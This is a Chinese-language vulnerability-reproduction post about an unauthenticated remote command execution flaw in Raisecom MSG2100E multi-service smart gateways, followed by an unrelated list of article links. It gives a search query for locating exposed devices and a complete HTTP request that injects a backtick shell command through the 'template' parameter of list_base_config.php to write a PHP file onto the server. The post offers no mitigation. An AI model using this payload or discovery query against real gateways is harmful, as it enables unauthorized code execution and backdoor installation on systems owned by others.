当前位置: 首页 > news >正文

漏洞复现-R24-1瑞斯康达-多业务智能网关-RCE

本文来自无问社区,更多漏洞信息可前往查看icon-default.png?t=N7T8http://www.wwlib.cn/index.php/artread/artid/12523.html

0x01 产品简介

MSG2100E系列融合型多业务智能网关是瑞斯康达公司面向中小企业及行业分支机构推出的新一代语音融合接入型网络产品。

0x02 漏洞概述

瑞斯康达-多业务智能网关 list_base_config.php 存在远程命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 复现环境

body="/images/raisecom/back.gif" && title=="Web user login"

图片

0x04 漏洞复现

命令执行写文件
payload:

GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close

效果图:

图片

验证图:

图片

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • LeetCode 101.对称二叉树 C写法
  • 一款以流程管理为核心的信息化快速开发的办公OA平台,一体化工作平台,开箱即用,私活利器(附源码)
  • RK3588+MIPI+GMSL+AI摄像机:自动车载4/8通道GMSL采集/边缘计算盒解决方案
  • 深入分析程序员面试中的“八股文”到底起到了哪几个方面你的作用 有没有真正的实际作用
  • AI-PaddleOCR2.8在VS2019编译运行基于C++引擎推理CPU版本
  • 阿里P8大佬推荐的前端书籍资料,限时免费领取!
  • GraphHopper-map-navi_路径规划、导航(web前端页面版)
  • 无人机环保行业解决方案-河道自动巡检
  • Python爬虫技术 第24节 数据清洗和预处理(二)
  • 前端表格控件:打造自动化报表的高效工具
  • 国家超算互联网平台:模型服务体验与本地部署推理实践
  • 02 Golang面向对象编程_20240727 课程笔记
  • Day10--mybatis多表连接查询学习(一对一、一对多、多对多)
  • Mongodb文档和数组的通配符索引
  • JAVA小白学习日记Day10
  • const let
  • docker-consul
  • ECS应用管理最佳实践
  • FineReport中如何实现自动滚屏效果
  • GDB 调试 Mysql 实战(三)优先队列排序算法中的行记录长度统计是怎么来的(上)...
  • Java 实战开发之spring、logback配置及chrome开发神器(六)
  • JavaScript中的对象个人分享
  • Quartz初级教程
  • React as a UI Runtime(五、列表)
  • Redis在Web项目中的应用与实践
  • Spark学习笔记之相关记录
  • vue 配置sass、scss全局变量
  • 从setTimeout-setInterval看JS线程
  • 机器学习学习笔记一
  • 警报:线上事故之CountDownLatch的威力
  • 嵌入式文件系统
  • 微信小程序设置上一页数据
  • 我从编程教室毕业
  • 与 ConTeXt MkIV 官方文档的接驳
  • ​linux启动进程的方式
  • ​RecSys 2022 | 面向人岗匹配的双向选择偏好建模
  • $GOPATH/go.mod exists but should not goland
  • (0)Nginx 功能特性
  • (03)光刻——半导体电路的绘制
  • (done) NLP “bag-of-words“ 方法 (带有二元分类和多元分类两个例子)词袋模型、BoW
  • (附源码)spring boot基于Java的电影院售票与管理系统毕业设计 011449
  • (十三)Flink SQL
  • (一)eclipse Dynamic web project 工程目录以及文件路径问题
  • (终章)[图像识别]13.OpenCV案例 自定义训练集分类器物体检测
  • (转)利用ant在Mac 下自动化打包签名Android程序
  • .apk 成为历史!
  • .cfg\.dat\.mak(持续补充)
  • .Family_物联网
  • .gitignore
  • .net core docker部署教程和细节问题
  • .Net Core中Quartz的使用方法
  • .NET Framework 3.5中序列化成JSON数据及JSON数据的反序列化,以及jQuery的调用JSON
  • .net6使用Sejil可视化日志
  • .netcore如何运行环境安装到Linux服务器
  • .NET面试题(二)